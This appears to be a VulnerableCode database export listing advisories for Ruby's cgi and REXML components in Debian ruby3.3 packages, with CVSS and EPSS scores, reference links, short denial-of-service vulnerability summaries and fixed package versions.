Package Instance

reference_id

reference_type

scores

value	5.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

reference_url

reference_id

reference_type

scores

value	5.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

reference_url

reference_id

reference_type

scores

value	5.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

reference_url

reference_id

reference_type

scores

value	5.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/cgi/CVE-2025-27219.yml

reference_url

reference_id

reference_type

scores

value	5.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-04T16:41:05Z/

url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/cgi/CVE-2025-27219.yml

reference_url

https://hackerone.com/reports/2936778

reference_id

reference_type

scores

value	5.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-04T16:41:05Z/

url

https://hackerone.com/reports/2936778

reference_url

https://lists.debian.org/debian-lts-announce/2025/03/msg00008.html

reference_id

reference_type

scores

value	5.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2025/03/msg00008.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-27219

reference_id

reference_type

scores

value	5.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-27219

reference_url

https://www.cve.org/CVERecord?id=CVE-2025-27219

reference_id

reference_type

scores

value	5.8
scoring_system	cvssv3
scoring_elements

value	5.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://www.cve.org/CVERecord?id=CVE-2025-27219

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103792
reference_id	1103792
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103792

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2349699
reference_id	2349699
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2349699

reference_url

https://github.com/advisories/GHSA-gh9q-2xrm-x6qv

reference_id

GHSA-gh9q-2xrm-x6qv

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-gh9q-2xrm-x6qv

reference_url	https://access.redhat.com/errata/RHSA-2025:10217
reference_id	RHSA-2025:10217
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:10217

reference_url	https://access.redhat.com/errata/RHSA-2025:4063
reference_id	RHSA-2025:4063
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4063

reference_url	https://access.redhat.com/errata/RHSA-2025:4487
reference_id	RHSA-2025:4487
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4487

reference_url	https://access.redhat.com/errata/RHSA-2025:4488
reference_id	RHSA-2025:4488
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4488

reference_url	https://access.redhat.com/errata/RHSA-2025:4493
reference_id	RHSA-2025:4493
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4493

reference_url	https://access.redhat.com/errata/RHSA-2025:8131
reference_id	RHSA-2025:8131
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:8131

reference_url	https://usn.ubuntu.com/7418-1/
reference_id	USN-7418-1
reference_type
scores
url	https://usn.ubuntu.com/7418-1/

reference_url	https://usn.ubuntu.com/7442-1/
reference_id	USN-7442-1
reference_type
scores
url	https://usn.ubuntu.com/7442-1/

fixed_packages

url	pkg:deb/debian/ruby3.3@3.3.7-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.7-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.7-2%3Fdistro=trixie

url	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-2%3Fdistro=trixie

aliases CVE-2025-27219, GHSA-gh9q-2xrm-x6qv

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-exq5-cnrm-3uhd

url VCID-h4mf-99f4-9bdw

vulnerability_id VCID-h4mf-99f4-9bdw

summary

CGI has Regular Expression Denial of Service (ReDoS) potential in Util#escapeElement
There is a possibility for Regular expression Denial of Service (ReDoS) by in the cgi gem. This vulnerability has been assigned the CVE identifier CVE-2025-27220. We recommend upgrading the cgi gem.

## Details

The regular expression used in `CGI::Util#escapeElement` is vulnerable to ReDoS. The crafted input could lead to a high CPU consumption.

This vulnerability only affects Ruby 3.1 and 3.2. If you are using these versions, please update CGI gem to version 0.3.5.1, 0.3.7, 0.4.2 or later.

## Affected versions

cgi gem versions <= 0.3.5, 0.3.6, 0.4.0 and 0.4.1.

## Credits

Thanks to svalkanov for discovering this issue.
Also thanks to nobu for fixing this vulnerability.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27220.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27220.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-27220

reference_id

reference_type

scores

value	0.00181
scoring_system	epss
scoring_elements	0.39805
published_at	2026-04-13T12:55:00Z

value	0.00181
scoring_system	epss
scoring_elements	0.39827
published_at	2026-04-18T12:55:00Z

value	0.00181
scoring_system	epss
scoring_elements	0.39822
published_at	2026-04-12T12:55:00Z

value	0.00181
scoring_system	epss
scoring_elements	0.39855
published_at	2026-04-16T12:55:00Z

value	0.002
scoring_system	epss
scoring_elements	0.42161
published_at	2026-04-11T12:55:00Z

value	0.00246
scoring_system	epss
scoring_elements	0.47821
published_at	2026-05-12T12:55:00Z

value	0.00246
scoring_system	epss
scoring_elements	0.47759
published_at	2026-05-05T12:55:00Z

value	0.00246
scoring_system	epss
scoring_elements	0.47791
published_at	2026-05-11T12:55:00Z

value	0.00246
scoring_system	epss
scoring_elements	0.47848
published_at	2026-05-09T12:55:00Z

value	0.00246
scoring_system	epss
scoring_elements	0.47826
published_at	2026-05-07T12:55:00Z

value	0.00253
scoring_system	epss
scoring_elements	0.48634
published_at	2026-04-21T12:55:00Z

value	0.00253
scoring_system	epss
scoring_elements	0.48579
published_at	2026-04-29T12:55:00Z

value	0.00253
scoring_system	epss
scoring_elements	0.48629
published_at	2026-04-26T12:55:00Z

value	0.00253
scoring_system	epss
scoring_elements	0.48618
published_at	2026-04-24T12:55:00Z

value	0.00282
scoring_system	epss
scoring_elements	0.51613
published_at	2026-04-08T12:55:00Z

value	0.00282
scoring_system	epss
scoring_elements	0.51609
published_at	2026-04-09T12:55:00Z

value	0.00483
scoring_system	epss
scoring_elements	0.65173
published_at	2026-04-07T12:55:00Z

value	0.00566
scoring_system	epss
scoring_elements	0.68405
published_at	2026-04-02T12:55:00Z

value	0.00566
scoring_system	epss
scoring_elements	0.68425
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-27220

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27220
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27220

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

reference_id

reference_type

scores

value	4.0
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

reference_url

reference_id

reference_type

scores

value	4.0
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

reference_url

reference_id

reference_type

scores

value	4.0
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

reference_url

reference_id

reference_type

scores

value	4.0
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/cgi/CVE-2025-27220.yml

reference_url

reference_id

reference_type

scores

value	4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	4.0
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-04T16:39:36Z/

url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/cgi/CVE-2025-27220.yml

reference_url

https://hackerone.com/reports/2890322

reference_id

reference_type

scores

value	4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	4.0
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-04T16:39:36Z/

url

https://hackerone.com/reports/2890322

reference_url

https://lists.debian.org/debian-lts-announce/2025/03/msg00008.html

reference_id

reference_type

scores

value	4.0
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2025/03/msg00008.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-27220

reference_id

reference_type

scores

value	4.0
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-27220

reference_url

https://www.cve.org/CVERecord?id=CVE-2025-27220

reference_id

reference_type

scores

value	4.0
scoring_system	cvssv3
scoring_elements

value	4.0
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://www.cve.org/CVERecord?id=CVE-2025-27220

reference_url

https://www.ruby-lang.org/en/news/2025/02/26/security-advisories

reference_id

reference_type

scores

value	4.0
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://www.ruby-lang.org/en/news/2025/02/26/security-advisories

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103793
reference_id	1103793
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103793

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2349696
reference_id	2349696
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2349696

reference_url

https://github.com/advisories/GHSA-mhwm-jh88-3gjf

reference_id

GHSA-mhwm-jh88-3gjf

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-mhwm-jh88-3gjf

reference_url	https://access.redhat.com/errata/RHSA-2025:4063
reference_id	RHSA-2025:4063
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4063

reference_url	https://access.redhat.com/errata/RHSA-2025:4487
reference_id	RHSA-2025:4487
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4487

reference_url	https://access.redhat.com/errata/RHSA-2025:4488
reference_id	RHSA-2025:4488
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4488

reference_url	https://usn.ubuntu.com/7418-1/
reference_id	USN-7418-1
reference_type
scores
url	https://usn.ubuntu.com/7418-1/

reference_url	https://usn.ubuntu.com/7442-1/
reference_id	USN-7442-1
reference_type
scores
url	https://usn.ubuntu.com/7442-1/

fixed_packages

url	pkg:deb/debian/ruby3.3@3.3.7-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.7-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.7-2%3Fdistro=trixie

url	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-2%3Fdistro=trixie

aliases CVE-2025-27220, GHSA-mhwm-jh88-3gjf

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-h4mf-99f4-9bdw

url VCID-jdtw-bn8z-e3b6

vulnerability_id VCID-jdtw-bn8z-e3b6

summary

REXML denial of service vulnerability
### Impact

The REXML gem before 3.3.6 has a DoS vulnerability when it parses an XML that has many deep elements that have same local name attributes.

If you need to parse untrusted XMLs with tree parser API like `REXML::Document.new`, you may be impacted to this vulnerability. If you use other parser APIs such as stream parser API and SAX2 parser API, this vulnerability is not affected.

### Patches

The REXML gem 3.3.6 or later include the patch to fix the vulnerability.

### Workarounds

Don't parse untrusted XMLs with tree parser API.

### References

* https://www.ruby-lang.org/en/news/2024/08/22/dos-rexml-cve-2024-43398/ : An announce on www.ruby-lang.org

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-43398.json

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-43398.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2024-43398

reference_id

reference_type

scores

value	0.01135
scoring_system	epss
scoring_elements	0.78402
published_at	2026-04-16T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78373
published_at	2026-04-13T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.7838
published_at	2026-04-12T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78493
published_at	2026-05-07T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78468
published_at	2026-05-05T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78325
published_at	2026-04-02T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78356
published_at	2026-04-04T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78339
published_at	2026-04-07T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78365
published_at	2026-04-08T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78371
published_at	2026-04-09T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78521
published_at	2026-05-12T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78506
published_at	2026-05-11T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78397
published_at	2026-04-11T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78401
published_at	2026-04-18T12:55:00Z

value	0.01135
scoring_system	epss
scoring_elements	0.78509
published_at	2026-05-09T12:55:00Z

value	0.01167
scoring_system	epss
scoring_elements	0.78691
published_at	2026-04-24T12:55:00Z

value	0.01167
scoring_system	epss
scoring_elements	0.78716
published_at	2026-04-29T12:55:00Z

value	0.01167
scoring_system	epss
scoring_elements	0.78699
published_at	2026-04-26T12:55:00Z

value	0.01167
scoring_system	epss
scoring_elements	0.78661
published_at	2026-04-21T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2024-43398

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43398
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43398

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.2
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/rexml/commit/7cb5eaeb221c322b9912f724183294d8ce96bae3

reference_url

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.2
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ruby/rexml/commit/7cb5eaeb221c322b9912f724183294d8ce96bae3

reference_url

https://github.com/ruby/rexml/releases/tag/v3.3.6

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.2
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-22T14:43:15Z/

url

https://github.com/ruby/rexml/releases/tag/v3.3.6

reference_url

https://github.com/ruby/rexml/security/advisories/GHSA-vmwr-mc7x-5vc3

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3
scoring_elements

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	8.2
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-22T14:43:15Z/

url

https://github.com/ruby/rexml/security/advisories/GHSA-vmwr-mc7x-5vc3

reference_url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-43398.yml

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.2
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rexml/CVE-2024-43398.yml

reference_url

https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.2
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2025/01/msg00011.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2024-43398

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.2
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2024-43398

reference_url

https://security.netapp.com/advisory/ntap-20250103-0006

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.2
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://security.netapp.com/advisory/ntap-20250103-0006

reference_url

https://www.ruby-lang.org/en/news/2024/08/22/dos-rexml-cve-2024-43398

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.2
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://www.ruby-lang.org/en/news/2024/08/22/dos-rexml-cve-2024-43398

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1083190
reference_id	1083190
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1083190

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2307297
reference_id	2307297
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2307297

reference_url

https://github.com/advisories/GHSA-vmwr-mc7x-5vc3

reference_id

GHSA-vmwr-mc7x-5vc3

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-vmwr-mc7x-5vc3

reference_url	https://security.gentoo.org/glsa/202507-08
reference_id	GLSA-202507-08
reference_type
scores
url	https://security.gentoo.org/glsa/202507-08

reference_url	https://access.redhat.com/errata/RHSA-2024:6670
reference_id	RHSA-2024:6670
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6670

reference_url	https://access.redhat.com/errata/RHSA-2024:6702
reference_id	RHSA-2024:6702
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6702

reference_url	https://access.redhat.com/errata/RHSA-2024:6703
reference_id	RHSA-2024:6703
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6703

reference_url	https://access.redhat.com/errata/RHSA-2024:6784
reference_id	RHSA-2024:6784
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6784

reference_url	https://access.redhat.com/errata/RHSA-2024:6785
reference_id	RHSA-2024:6785
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6785

reference_url	https://access.redhat.com/errata/RHSA-2025:4063
reference_id	RHSA-2025:4063
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4063

reference_url	https://access.redhat.com/errata/RHSA-2025:4488
reference_id	RHSA-2025:4488
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:4488

reference_url	https://usn.ubuntu.com/7256-1/
reference_id	USN-7256-1
reference_type
scores
url	https://usn.ubuntu.com/7256-1/

reference_url	https://usn.ubuntu.com/7418-1/
reference_id	USN-7418-1
reference_type
scores
url	https://usn.ubuntu.com/7418-1/

fixed_packages

url	pkg:deb/debian/ruby3.3@3.3.5-1?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.5-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.5-1%3Fdistro=trixie

url	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
purl	pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
